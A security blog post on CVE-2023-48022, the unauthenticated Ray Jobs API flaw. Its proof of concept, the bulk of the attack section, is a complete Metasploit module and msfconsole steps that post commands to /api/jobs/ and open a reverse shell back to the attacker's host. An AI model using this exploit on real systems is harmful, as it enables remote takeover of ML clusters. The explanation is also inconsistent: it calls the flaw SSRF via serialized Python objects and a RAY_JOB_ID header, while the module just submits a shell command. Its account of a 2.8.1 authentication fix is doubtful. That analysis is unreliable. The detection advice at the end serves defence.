Introduction
The world of distributed computing for machine learning (ML) was rattled in late 2023 by CVE-2023-48022, a critical vulnerability lurking within the popular Ray framework. This vulnerability exposed Ray clusters to a nasty case of Server-Side Request Forgery (SSRF), leaving them vulnerable to remote compromise. For security researchers and system administrators alike, understanding the details of CVE-2023-48022 is crucial to fortifying Ray deployments.
Ray in the Spotlight
Ray, developed by Anyscale, is an open-source framework that empowers developers to seamlessly scale Python applications and ML workloads across clusters. Its ability to handle complex computations with ease has garnered the attention of industry giants like Uber, Amazon, and OpenAI. However, CVE-2023-48022 cast a shadow over Ray's brilliance, highlighting a security flaw that could be exploited by malicious actors.
The Anatomy of the Attack
The vulnerability stemmed from Ray's Jobs API, which, in versions prior to the fix, lacked proper authentication. This gaping hole allowed attackers to forge requests to the API, essentially tricking the Ray cluster into executing arbitrary commands on the underlying system.
The Vulnerability: Missing Authentication in the Jobs API
The crux of CVE-2023-48022 lies in the lack of robust authentication for the Jobs API in Ray versions prior to 2.8.1. This meant an unauthenticated attacker could potentially forge requests to the API and manipulate Ray's behavior.
Here's a technical breakdown of the exploit:
Crafting the Malicious Request: The attacker constructs a specially crafted HTTP request targeting the Jobs API endpoint. This request would typically include a RAY_JOB_ID header and a serialized Python object representing the malicious payload.
Exploiting SSRF: The vulnerability stemmed from Ray's reliance on the requests library to execute tasks specified in the Jobs API. Without proper validation, Ray would blindly attempt to fulfill the attacker's request, even if it involved fetching remote resources (SSRF).
Code Execution and Shenanigans: The attacker could embed malicious code within the serialized Python object submitted through the Jobs API. Once Ray deserialized and executed the object on a worker node, the attacker code would have the privileges of the Ray user running the cluster.
Proof of Concept
First we will need to install a vulnerable version of Ray in a virtual environment to set up a lab for this PoC. We can do this by running:
pip3 install -U "ray[default]"==2.8.0
Once we have the ray installed, we can go ahead and start the server:
ray start --head --dashboard-host=0.0.0.0
We can verify the status of the running Ray server by accessing the default port 8265
We will be using a metasploit module to exploit this vulnerability and get a reverse shell into the target system hosting the vulnerable Ray server.
Copy the following metasploit module into a file, we are naming the file "ray_job_rce.rb"
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Ray Agent Job RCE',
'Description' => %q{
RCE in Ray via the agent job submission endpoint. This is intended functionality as
Ray's main purpose is executing arbitrary workloads.
By default, Ray has no authentication.
},
'Author' => ['sierrabearchell', 'byt3bl33d3r <marcello@protectai.com>', 'Akos Jakab'],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/']
],
'Platform' => 'linux',
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-11-15',
'DefaultOptions' => {
'RPORT' => 8265,
'SSL' => false,
'PAYLOAD' => 'linux/x64/shell/reverse_tcp'
}
))
register_options(
[
OptString.new('COMMAND', [false, 'The command to execute', '']),
])
end
def check
# Simple check to see if target is reachable; consider enhancing based on app's specific
behavior or endpoints
res = send_request_cgi('uri' => '/')
return res.nil? ? CheckCode::Unknown : CheckCode::Detected
end
def execute_command(cmd, opts = {})
target_uri_paths = ['/api/jobs/', '/api/job_agent/jobs/']
target_uri_paths.each do |uri|
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri),
'ctype' => 'application/json',
'data' => {'entrypoint' => cmd}.to_json
})
unless res
print_error("Failed to receive response for #{uri}")
next
end
if res.code == 200
print_good("Command execution successful: #{cmd}")
job_data = res.get_json_document
print_status("Job ID: #{job_data['job_id']}, Submission ID:
#{job_data['submission_id']}")
return
else
print_error("Failed command execution for #{uri}: HTTP #{res.code}")
end
rescue ::Rex::ConnectionError => e
print_error("Failed to connect to the server: #{e.message}")
return
end
end
fail_with(Failure::Unknown, "Command execution failed for all paths")
end
def exploit
if datastore['COMMAND'].nil? || datastore['COMMAND'].empty?
print_status('No custom command specified, executing reverse shell...')
execute_cmdstager
else
print_status("Executing custom command: #{datastore['COMMAND']}")
execute_command(datastore['COMMAND'])
end
end
end
Now copy it in the exploits directory of metasploit:
cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/
Let's launch the metasploit console and reload so it can pick the newly added module:
msfconsole
reload_all
Now load the exploit to perform the attack:
use exploit/multi/misc/ray_job_rce
We need to set up the options required by the module before we launch the exploit. Let's set RHOST (remote host) which is our target server and LHOST (local host) which is our attacker server. The port 8265 would be already set up by default.
set RHOST <TARGET_IP>
set LHOST <LOCAL_IP>
Once we have set up the options, we can finally launch the exploit and see if it is able to give us a reverse shell into the target system:
run
The Patch and the Aftermath
The security community breathed a collective sigh of relief when Anyscale released a fix for CVE-2023-48022 in Ray versions 2.8.1 and above. The patch implemented proper authentication for the Jobs API, effectively closing the backdoor attackers were exploiting.
However, reports emerged in March 2024 suggesting that attackers had been actively exploiting this vulnerability for months, compromising numerous Ray deployments. This emphasizes the importance of staying updated with security patches and maintaining good security hygiene.
Advanced Detection Techniques
While the patch mitigates the vulnerability, security researchers can employ advanced techniques for threat hunting and post-mortem analysis:
Log Analysis: Scrutinize Ray logs for unusual job submissions, particularly those originating from external sources. Look for inconsistencies in job types or resource usage patterns.
Network Traffic Monitoring: Monitor network traffic for suspicious outgoing connections initiated by Ray processes. Identify connections to unexpected remote URLs that could be indicative of SSRF attempts.
Code Analysis: Analyze the Ray codebase, particularly the components handling the Jobs API, to identify potential bypass mechanisms or lingering vulnerabilities.
Conclusion
While CVE-2023-48022 has been patched, it serves as a wake-up call for the security community. By understanding the technical intricacies of this vulnerability, security researchers can develop better detection and mitigation strategies. System administrators, on the other hand, can leverage this knowledge to fortify their Ray deployments and safeguard critical ML workloads. By working together, we can create a more secure environment for distributed computing and ML.
Disclaimer
The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2023-48022 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.
It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.